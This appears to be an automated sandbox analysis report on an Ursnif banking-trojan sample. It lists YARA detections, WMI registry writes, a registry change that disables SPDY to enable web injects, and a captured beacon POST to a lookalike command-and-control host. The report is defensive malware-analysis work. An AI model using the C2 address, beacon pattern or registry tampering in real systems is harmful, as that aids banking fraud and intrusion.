                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.youtube.com (Youtube)
                      Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Find us: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Follow us: www.twitter.com/g5games equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Watch us: www.youtube.com/g5enter equals www.youtube.com (Youtube)
                      Source: unknown HTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Content-Length: 2 Host: art.microsoftsofymicrosoftsoft.at

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD3FAB CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2274
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD2654
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD7E30
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD4FA7
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04572C07
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04572499
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04565518
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456AD2E
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457C5F4
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04574658
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456279B
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045788BB
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456E9BD
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564AFE
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045852A0
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04582339
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB2499
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB2C07
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBC5F4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAAD2E
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA5518
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB4658
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA279B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB88BB
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAE9BD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC52A0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4AFE
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC2339
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A77E30
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A72654
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A74FA7
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093F2F0
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093B530
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093179C
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0094508C
                      Source: C:\Windows\System32\control.exe Code function: 34_2_009340B4
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0094E0CF
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00923804
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0092E008
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00937834
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0094C874
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00929074
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00933074
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00944988
                      Source: C:\Windows\System32\control.exe Code function: 34_2_009459A8
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093D9AC
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093C1D4
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0092B1D8
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093C9F0
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093D150
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0094D2DC
                      Source: C:\Windows\System32\control.exe Code function: 34_2_009432EC
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00938218
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00937278
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0094AA6C
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00926A68
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00939268
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0094EB10
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00936B1C
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00922B74
                      Source: C:\Windows\System32\control.exe Code function: 34_2_009464F4
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00933C24
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00930474
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093ED94
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0094DD9C
                      Source: C:\Windows\System32\control.exe Code function: 34_2_009385CC
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00938DF4
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00949524
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00937D44
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093FD6C
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0092C6F4
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00946E34
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00928628
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0092779C
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093DFB8
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00943F08
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00939770
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DF2F0
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DB530
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C6A68
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EEB10
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E3F08
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CC6F4
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E32EC
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67ED2DC
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C2B74
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D9770
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D6B1C
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CE008
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C3804
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DDFB8
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C779C
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D179C
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E508C
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EC874
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C9074
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D3074
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D0474
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7834
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D3C24
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E64F4
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EE0CF
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D40B4
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E4988
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DFD6C
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DD150
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7D44
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E9524
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D8DF4
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DC9F0
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CB1D8
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DC1D4
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D85CC
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DD9AC
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E59A8
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EDD9C
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DED94
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7278
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EAA6C
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D9268
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E6E34
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C8628
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D8218
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009788BB
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096E9BD
